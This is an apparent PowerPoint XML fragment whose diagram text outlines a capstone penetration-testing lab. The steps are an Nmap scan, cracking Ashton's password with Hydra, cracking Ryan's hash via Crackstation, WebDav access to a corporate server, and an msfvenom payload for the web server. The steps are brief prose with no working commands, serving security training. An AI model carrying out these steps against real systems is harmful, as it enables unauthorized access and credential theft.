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7" r:id="rId1"/>
    <p:sldMasterId id="2147483648" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId27"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="287" r:id="rId4"/>
    <p:sldId id="275" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="258" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="277" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="28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46DF0F-F51C-45F1-9402-0474F79DA643}" v="574" dt="2022-06-20T19:49:05.314"/>
    <p1510:client id="{6ACC07E9-4630-4379-94F4-1CCBBAD64670}" v="75" dt="2022-06-20T21:28:46.133"/>
    <p1510:client id="{81882AD5-B233-4B4A-903A-D05354BE12D9}" v="163" dt="2022-06-20T17:52:25.543"/>
    <p1510:client id="{B9FE6963-0AB9-4561-A5C6-75233AC0D3DB}" v="263" dt="2022-06-20T18:12:39.388"/>
    <p1510:client id="{BB251FA5-281E-4A98-B441-0E94A3EE917D}" v="92" dt="2022-06-20T23:22:18.842"/>
    <p1510:client id="{FFF15903-A3E2-4073-B742-6A3AB731A164}" v="4" dt="2022-06-17T03:38:21.1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FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple5" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_3" csCatId="accent1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A75EE749-037E-4D66-996A-C6BB6684355E}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>In the Kali Machine : use Nmap to find the open ports</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24FD91F4-BB50-4A67-B7A9-AA83E0826BC1}" type="parTrans" cxnId="{91661359-146E-49D0-A7EA-771ABBB7CE7A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CC5B18-FAC1-4BDF-8E8D-6E52D1715E99}" type="sibTrans" cxnId="{91661359-146E-49D0-A7EA-771ABBB7CE7A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B93937BB-D27E-438B-81A7-78C41D64204D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Take the results from the Nmap scan and open a browser to the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t> address of the capstone machine and port eighty.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB6B45A1-69B8-43CF-99B0-AED9F85C6568}" type="parTrans" cxnId="{770D5B31-91D9-4295-A1D6-8D3FC2E40BB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA6C71C9-64F0-4D7B-8260-459F7DEF191C}" type="sibTrans" cxnId="{770D5B31-91D9-4295-A1D6-8D3FC2E40BB4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74ABE83C-9692-44B5-9AAB-E72DE257281A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Use the contents of what you find on the web server to crack Ashton's password.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38714BDC-E876-40EA-AE8F-03924581F922}" type="parTrans" cxnId="{2F998A8B-AADF-42DE-A21B-59A6585203F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55DAA546-ED29-4594-AABC-1696015CB351}" type="sibTrans" cxnId="{2F998A8B-AADF-42DE-A21B-59A6585203F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AFD624E1-F96E-4EC6-BC2C-ACC93ED7E133}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Use Hydra to crack Ashton's password.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21B5F217-1AF0-476A-8EFF-26F9323E9D44}" type="parTrans" cxnId="{9F3444F1-9A65-476B-9527-6205D3D781B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3043FF8-3BF2-40BC-844E-DCDA96451CC7}" type="sibTrans" cxnId="{9F3444F1-9A65-476B-9527-6205D3D781B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E480E0A-3C6D-4B23-97AF-8CBEDA391B3F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Once Hydra has cracked Ashton's password use it to login to his account on the server.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB9FA9FA-6E9F-442C-B448-3A2B5123E3F0}" type="parTrans" cxnId="{76AEDE85-0566-44C4-A55F-74F535E24F83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5316FFCF-53AF-41AB-9FCB-C090DA09C61D}" type="sibTrans" cxnId="{76AEDE85-0566-44C4-A55F-74F535E24F83}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B02C47A5-90BA-4693-9403-247A783032F2}" type="pres">
      <dgm:prSet presAssocID="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83C0E779-8552-445C-9B9B-27DD3DCC936A}" type="pres">
      <dgm:prSet presAssocID="{A75EE749-037E-4D66-996A-C6BB6684355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A0F9D4C-F06E-4759-865B-8D5032AE25B6}" type="pres">
      <dgm:prSet presAssocID="{15CC5B18-FAC1-4BDF-8E8D-6E52D1715E99}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8213466B-98D9-42B9-9CB5-C83CB6D5DAF2}" type="pres">
      <dgm:prSet presAssocID="{B93937BB-D27E-438B-81A7-78C41D64204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F34C65B-A9F8-460F-8F02-45697EB999E9}" type="pres">
      <dgm:prSet presAssocID="{AA6C71C9-64F0-4D7B-8260-459F7DEF191C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C42F2417-5D4F-4B80-B5CC-96E6A590A26A}" type="pres">
      <dgm:prSet presAssocID="{74ABE83C-9692-44B5-9AAB-E72DE257281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60D76B4-1008-4C6D-851C-89B20EF0A9A2}" type="pres">
      <dgm:prSet presAssocID="{55DAA546-ED29-4594-AABC-1696015CB351}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7BC75A77-D2FE-47DF-AF1C-C00BF9693734}" type="pres">
      <dgm:prSet presAssocID="{AFD624E1-F96E-4EC6-BC2C-ACC93ED7E13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D4FA938-A1BF-4884-AF47-D11AFAE59AE8}" type="pres">
      <dgm:prSet presAssocID="{E3043FF8-3BF2-40BC-844E-DCDA96451CC7}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36F4812C-AB44-4145-B6E4-ED6CD65A2C5E}" type="pres">
      <dgm:prSet presAssocID="{4E480E0A-3C6D-4B23-97AF-8CBEDA391B3F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70D5B31-91D9-4295-A1D6-8D3FC2E40BB4}" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{B93937BB-D27E-438B-81A7-78C41D64204D}" srcOrd="1" destOrd="0" parTransId="{AB6B45A1-69B8-43CF-99B0-AED9F85C6568}" sibTransId="{AA6C71C9-64F0-4D7B-8260-459F7DEF191C}"/>
    <dgm:cxn modelId="{6864DA36-74D7-4B88-9CD1-8A0E002EA207}" type="presOf" srcId="{A75EE749-037E-4D66-996A-C6BB6684355E}" destId="{83C0E779-8552-445C-9B9B-27DD3DCC936A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{83EFBE6D-5A0A-42C7-B4E4-4490C422F335}" type="presOf" srcId="{74ABE83C-9692-44B5-9AAB-E72DE257281A}" destId="{C42F2417-5D4F-4B80-B5CC-96E6A590A26A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{91661359-146E-49D0-A7EA-771ABBB7CE7A}" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{A75EE749-037E-4D66-996A-C6BB6684355E}" srcOrd="0" destOrd="0" parTransId="{24FD91F4-BB50-4A67-B7A9-AA83E0826BC1}" sibTransId="{15CC5B18-FAC1-4BDF-8E8D-6E52D1715E99}"/>
    <dgm:cxn modelId="{1A13E77A-C666-4831-8CF7-FD5EFC0A76A8}" type="presOf" srcId="{B93937BB-D27E-438B-81A7-78C41D64204D}" destId="{8213466B-98D9-42B9-9CB5-C83CB6D5DAF2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5F0B3581-DE04-446C-89EE-8AC212F1581D}" type="presOf" srcId="{AFD624E1-F96E-4EC6-BC2C-ACC93ED7E133}" destId="{7BC75A77-D2FE-47DF-AF1C-C00BF9693734}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{76AEDE85-0566-44C4-A55F-74F535E24F83}" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{4E480E0A-3C6D-4B23-97AF-8CBEDA391B3F}" srcOrd="4" destOrd="0" parTransId="{EB9FA9FA-6E9F-442C-B448-3A2B5123E3F0}" sibTransId="{5316FFCF-53AF-41AB-9FCB-C090DA09C61D}"/>
    <dgm:cxn modelId="{2F998A8B-AADF-42DE-A21B-59A6585203F5}" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{74ABE83C-9692-44B5-9AAB-E72DE257281A}" srcOrd="2" destOrd="0" parTransId="{38714BDC-E876-40EA-AE8F-03924581F922}" sibTransId="{55DAA546-ED29-4594-AABC-1696015CB351}"/>
    <dgm:cxn modelId="{38FBF09D-76A8-4B0C-A691-A4F526F5271A}" type="presOf" srcId="{4E480E0A-3C6D-4B23-97AF-8CBEDA391B3F}" destId="{36F4812C-AB44-4145-B6E4-ED6CD65A2C5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{05E416DA-C5FE-4FB5-92E6-875A6850D5B4}" type="presOf" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{B02C47A5-90BA-4693-9403-247A783032F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9F3444F1-9A65-476B-9527-6205D3D781B2}" srcId="{48FAA5EB-4A9B-4072-A60A-31E5C0DDA8A3}" destId="{AFD624E1-F96E-4EC6-BC2C-ACC93ED7E133}" srcOrd="3" destOrd="0" parTransId="{21B5F217-1AF0-476A-8EFF-26F9323E9D44}" sibTransId="{E3043FF8-3BF2-40BC-844E-DCDA96451CC7}"/>
    <dgm:cxn modelId="{AEE03B6C-2C54-4197-98D5-26447DD9D5B3}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{83C0E779-8552-445C-9B9B-27DD3DCC936A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EAC7E992-9667-4960-8901-91B975165772}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{0A0F9D4C-F06E-4759-865B-8D5032AE25B6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{86281CF2-C51D-4471-90AB-C46646C1EA84}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{8213466B-98D9-42B9-9CB5-C83CB6D5DAF2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{08312799-944C-4D53-8CEB-2583E51B9198}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{7F34C65B-A9F8-460F-8F02-45697EB999E9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{54B970C4-DA08-4784-AF98-AAC4AB3220A1}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{C42F2417-5D4F-4B80-B5CC-96E6A590A26A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FBBC84F7-2EEC-424E-B507-BA60F9DCFD45}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{360D76B4-1008-4C6D-851C-89B20EF0A9A2}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3BE01805-FF16-4698-99B6-94B87EADCC10}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{7BC75A77-D2FE-47DF-AF1C-C00BF9693734}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A298773A-DBBC-4158-A6B8-47995DFA7CF1}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{4D4FA938-A1BF-4884-AF47-D11AFAE59AE8}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{65347B2F-92C1-42F9-86A6-A956CD9DD723}" type="presParOf" srcId="{B02C47A5-90BA-4693-9403-247A783032F2}" destId="{36F4812C-AB44-4145-B6E4-ED6CD65A2C5E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8090D1-62AC-4CC5-8551-0CD20637618F}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D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52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>On the Web Server-Information found in the folder "connect_to_corp_server" will give instructions on how to access the corporate server. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" type="parTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" type="sibTrans" cxnId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Using Crackstation.net : Ryan's hash can be cracked to find the password.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" type="parTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}" type="sibTrans" cxnId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB2169D3-C179-4444-9561-4EFFACDA0F95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light"/>
            </a:rPr>
            <a:t>Once connected to the WebDav server : use Ryan's credentials to gain access to the corporate server.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C52EA9CB-42A7-462A-94DC-F6E50F7193AD}" type="parTrans" cxnId="{474BA4EF-9246-420B-949B-4CE30C4EEA7B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D1795F4-D02E-4EE0-ADB7-411A91B506E3}" type="sibTrans" cxnId="{474BA4EF-9246-420B-949B-4CE30C4EEA7B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US">
              <a:latin typeface="Avenir Next LT Pro Light" panose="020F0302020204030204"/>
            </a:rPr>
            <a:t>Use the Kali Machine and the msfvenom tool to create a  payload to inject into the webserver.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CFE73A2-0173-458F-BA3D-2B2CF08479B2}" type="parTrans" cxnId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401EE494-355D-49C5-9E10-516214095594}" type="sibTrans" cxnId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{311065C5-C7C0-43F4-8144-456E680D03E2}" type="pres">
      <dgm:prSet presAssocID="{398090D1-62AC-4CC5-8551-0CD20637618F}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" type="pres">
      <dgm:prSet presAssocID="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E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CD002B5-AC36-4ED2-AD33-72653509322D}" type="pres">
      <dgm:prSet presAssocID="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" type="pres">
      <dgm:prSet presAssocID="{586B2209-4AA5-4065-B0B1-54919DBACC8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E2E5D78-904F-4E84-975F-B0876B3F5CA2}" type="pres">
      <dgm:prSet presAssocID="{4587CD84-8CDF-4B8A-AF09-948DE0759811}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5764351-1465-4EC1-AA94-7161171EB54E}" type="pres">
      <dgm:prSet presAssocID="{FB2169D3-C179-4444-9561-4EFFACDA0F9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7EC870F-4C2F-4A94-AEBE-AC2F8607A78E}" type="pres">
      <dgm:prSet presAssocID="{1D1795F4-D02E-4EE0-ADB7-411A91B506E3}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}" type="pres">
      <dgm:prSet presAssocID="{4C369621-6DA8-482A-9A0E-2B7FD368C64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DD55002-E983-4268-9BAB-0DB66DE2B0D3}" type="presOf" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{311065C5-C7C0-43F4-8144-456E680D03E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D9A20909-E8AE-4BE5-8B86-E6F68DDFCADD}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" srcOrd="0" destOrd="0" parTransId="{CFEFCC6D-C123-4C25-A6B9-0551661B3D11}" sibTransId="{4997C65B-170D-4C02-A8F0-1E86FABBDEB0}"/>
    <dgm:cxn modelId="{8045DD0E-C76E-437A-A8FF-A38575B86C40}" type="presOf" srcId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{15ED0C12-ABE3-45FD-B06B-68954DC7EE75}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{586B2209-4AA5-4065-B0B1-54919DBACC8D}" srcOrd="1" destOrd="0" parTransId="{3F1BFA5C-E8C3-41D4-8257-97E03AFD5D37}" sibTransId="{4587CD84-8CDF-4B8A-AF09-948DE0759811}"/>
    <dgm:cxn modelId="{152DAE3A-6DD3-4EAC-841C-A41ECD49A2C8}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}" srcOrd="3" destOrd="0" parTransId="{8CFE73A2-0173-458F-BA3D-2B2CF08479B2}" sibTransId="{401EE494-355D-49C5-9E10-516214095594}"/>
    <dgm:cxn modelId="{F29AC4A6-C2DB-4E4D-B03D-1048EB8BF132}" type="presOf" srcId="{FB2169D3-C179-4444-9561-4EFFACDA0F95}" destId="{B5764351-1465-4EC1-AA94-7161171EB54E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{57A9BEC6-5106-4994-B035-12573C7489E0}" type="presOf" srcId="{4C369621-6DA8-482A-9A0E-2B7FD368C646}" destId="{5942610E-AD9E-4FD2-9023-9542A85A3CC8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F8F23BE2-C945-4914-917B-4A0A6FC1D54C}" type="presOf" srcId="{52CA3B37-F1B4-48C2-8EE7-3120BF5243E6}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{474BA4EF-9246-420B-949B-4CE30C4EEA7B}" srcId="{398090D1-62AC-4CC5-8551-0CD20637618F}" destId="{FB2169D3-C179-4444-9561-4EFFACDA0F95}" srcOrd="2" destOrd="0" parTransId="{C52EA9CB-42A7-462A-94DC-F6E50F7193AD}" sibTransId="{1D1795F4-D02E-4EE0-ADB7-411A91B506E3}"/>
    <dgm:cxn modelId="{01D948BC-A59B-4BD1-BEC7-3EC34B98B8BE}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{6C18032D-7683-4919-91BB-00D5EECE15A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{823BD246-4040-4ECB-B018-A233BEFF3F22}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{BCD002B5-AC36-4ED2-AD33-72653509322D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9B6EB906-FD46-40DA-96EC-756CAA79F56C}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{35A0FCB7-2AEC-4F84-82FF-1DDFE33AB300}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CF83E961-7B8C-43D4-BB63-735F119A36F1}" type="presParOf" srcId="{311065C5-C7C0-43F4-8144-456E680D03E2}" destId="{0E2E5D78-904F-4E84-975F-B0876B3F5CA2}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
